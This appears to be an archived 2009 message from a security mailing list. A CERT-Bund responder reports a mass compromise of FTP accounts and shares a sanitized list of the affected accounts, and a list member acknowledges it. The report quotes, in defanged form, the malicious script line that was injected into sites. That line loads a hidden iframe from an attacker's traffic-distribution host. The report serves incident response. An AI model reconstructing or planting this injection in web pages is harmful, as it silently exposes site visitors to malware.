[nsp-sec] ACK Compromised ftp accounts
Zoe O'Connell
zoe at hotchilli.com
Tue Aug 25 07:42:13 EDT 2009
ACK AS8419, thanks.
Thomas Hungenberg wrote:
> ----------- nsp-security Confidential --------
>
>
> ------------------------------------------------------------------------
>
>
> The gzip'ed attachment did not make it to the list, so I'm sending the list
> again uncompressed.
>
>
> - Thomas
>
> CERT-Bund Incident Response & Anti-Malware Team
>
>
> Thomas Hungenberg schrieb:
>
>> Hi teams,
>>
>> I've come across an Iframer installation along with a list of 15.000+ ftp credentials.
>>
>> The Iframer tool most probably recently tried to inject this line (remove 'XXX'):
>> <scrXXXipt>document.write(\'<ifrXXXame src=\"htXXXtp://sexyy.ru/tds/go.php?sid=1\" width=\"0\" height=\"0\" style=\"display:none;visibility:hidden;\"></ifrXXXame>\');</scrXXXipt>
>>
>> Please find attached a sanitized list (pw removed) of the compromised ftp accounts.
>> Format: ASN | IP | CC | ftp username | AS name
>>
>> Top 10 country codes:
>>
>> 5240 US
>> 1263 RU
>> 1187 DE
>> 882 EU
>> 803 TR
>> 720 CZ
>> 674 FR
>> 655 PL
>> 564 HU
>> 475 NL
>>
>>
>> - Thomas
>>
>> CERT-Bund Incident Response & Anti-Malware Team
>>
>>
>
>
> ------------------------------------------------------------------------
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
More information about the nsp-security
mailing list